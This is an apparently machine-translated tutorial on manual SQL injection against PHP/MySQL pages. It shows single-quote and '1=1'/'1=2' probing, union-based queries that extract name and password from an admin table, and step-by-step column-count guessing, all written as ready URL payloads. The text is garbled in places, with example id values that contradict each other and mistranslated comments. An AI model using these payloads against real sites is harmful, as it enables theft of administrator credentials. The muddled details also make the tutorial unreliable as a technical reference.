Parsing the occurrence of PHP + MYSQL injection

When the value of the articleid variable is 123, let's assume what code will run on the server?

When the value of the articleid variable is 123, let's assume what code will run on the server?

1. SELECT */* Select function read information */

2. FROM infotable/* FROM the products data table */

3. WHERE id = '20140901';/* false when the condition is met */

/* XXXX */is the annotation symbol. when the program is running,/**/and some computers in the middle will automatically ignore it.

The actual code executed by the system is as follows:

1. select * from infotable where id = '201312 ';

Here, the id value is "123" obtained through the url value. what if I do this:

Info. php? Articleid = 123'

A single quotation mark is added next to it to compare the changes in the statements originally executed by the system:

1. select * from infotable where id = 123;

2. select * from infotable where id = 123 ';

A quotation mark is added at the end, indicating that the syntax is incorrect.

Note: Computer programming cannot get the expected results. There are two types of errors: syntax errors and logic errors. You will understand the differences after reading them carefully, this is why the first step of determining whether the injection point should be followed by a single quotation mark (a single quotation mark error cannot determine that the URL is an injection point, but it is only a step of judgment ), so the purpose of 1 = 1 and 1 = 2 is clear.

1. select * from infotable where id = 123;

2. select * from infotable where id = 123 and 1 = 1; // In fact, 1 is 1, so it should

Back to normal page

3. select * from infotable where id = 123 and 1 = 2; // In fact, in the computer, 1 is never equal to 2, and a logic error occurs, so the error page is returned. Manual injection usually uses the union query function. The following describes the union usage.

The first step of union injection is generally to guess the number of fields. If the injection point is a news page, the SQL statement executed on the page is:

1. select title, date, author, news, comm from news where id = 12;

When you perform union injection, the statement before union and the statement after union are both a complete SQL statement.

Statement, which can be executed separately

However, make sure that the numbers of fields are the same. for example, the preceding statement

1. select title, date, author, news, comm from news where id = 12;

2. select title, date, author, news, comm from news where id = 12 union select

Name, password, 3, 4, 5 from admin;

3. // news is the news Table segment, and admin is the administrator information segment.

4. // The Administrator information table segment obviously does not contain many fields in the news Table segment before union. Therefore, use numbers 3 to 5 instead. the numbers do not have a fixed format and can be set to 1 2 and 3, it can also be 111111 or 4435435 or simply use null.

Therefore, the preceding injection statement is constructed as follows:

1. info. php? Id = 12 + union + select + name, password, 3, 4, 5 + from + admin

2. // in SQL injection, the plus sign indicates space, because some browsers automatically convert the space to % 20,

If there are five in front of the union, but not five in the end of the union, a logic error occurs. the error page is displayed.

Since we do not know that a programmer has set several fields in the database, we usually guess the number of fields first, that is:

1. info. php? Id = 12 + union + select + 1

2. info. php? Id = 12 + union + select + 1, 2

3. info. php? Id = 12 + union + select + 1, 2, 3

4. info. php? Id = 12 + union + select + 1, 2, 3, 4

5. info. php? Id = 12 + union + select + 1, 2, 3, 4, 5

6. // You can also use order by to guess the usage.

The correct page is always guessed in this way. without a logical error, it means that the number of fields is consistent, and then ...... Later ......

Here we only provide ideas.